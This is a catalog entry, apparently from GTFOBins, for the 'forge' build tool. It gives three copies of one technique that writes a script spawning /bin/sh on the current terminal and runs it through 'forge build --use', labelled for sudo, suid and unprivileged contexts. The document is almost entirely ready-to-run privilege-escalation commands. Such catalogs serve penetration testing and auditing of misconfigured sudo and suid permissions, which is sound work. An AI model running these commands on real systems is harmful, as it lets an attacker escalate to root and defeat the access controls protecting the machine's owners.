Catalog GTFOBins

GTFO · Tool

forge

3 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
echo '#!/bin/sh' >/path/to/temp-file
echo -e "/bin/sh <$(tty) >$(tty) 2>$(tty)" >>/path/to/temp-file
chmod +x /path/to/temp-file
forge build --use /path/to/temp-file
Context
sudo
Native
shell
MITRE
T1059

shell

ExecutionPrivilege Escalation Linux
echo '#!/bin/sh' >/path/to/temp-file
echo -e "/bin/sh <$(tty) >$(tty) 2>$(tty)" >>/path/to/temp-file
chmod +x /path/to/temp-file
forge build --use /path/to/temp-file
Context
suid
Native
shell
MITRE
T1059

shell

Execution Linux
echo '#!/bin/sh' >/path/to/temp-file
echo -e "/bin/sh <$(tty) >$(tty) 2>$(tty)" >>/path/to/temp-file
chmod +x /path/to/temp-file
forge build --use /path/to/temp-file
Context
unprivileged
Native
shell
MITRE
T1059